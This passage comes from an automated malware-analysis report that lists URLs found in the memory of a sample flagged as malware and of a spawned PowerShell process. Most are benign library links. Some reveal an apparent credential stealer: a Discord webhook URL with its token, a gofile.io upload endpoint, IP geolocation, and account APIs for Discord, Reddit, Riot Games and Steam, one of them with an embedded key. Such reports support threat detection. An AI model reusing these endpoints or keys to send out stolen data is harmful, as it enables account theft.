Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444064609.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://httpbin.org/post
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440363772.0000018B45190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://json.org
Source: powershell.exe, 00000051.00000002.2334646014.00000260D11EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2334646014.00000260D1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://python.org
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2436331270.0000018B472F6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441263044.0000018B472F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://python.org/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://python.org:80
Source: powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000051.00000002.2305154049.00000260C28E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2339941788.00000260D93F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434897742.0000018B47394000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2139724207.0000018B4738F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441672563.0000018B47395000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://127.0.0.1:8443
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://account.riotgames.com/api/account/v1/user
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.reddit.com/api/access_token
Source: powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.gofile.io/getServer
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bugs.python.org/issue37179
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/0j9H
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454825824.00007FFD9DEB1000.00000040.00000001.01000000.00000020.sdmp String found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr String found in binary or memory: https://cryptography.io
Source: METADATA0.0.dr String found in binary or memory: https://cryptography.io/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr String found in binary or memory: https://cryptography.io/en/latest/changelog/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp String found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr String found in binary or memory: https://cryptography.io/en/latest/security/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v8/users/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430327032.0000018B487FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437876998.0000018B47955000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B478B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435278581.0000018B47933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/howto/mro.html
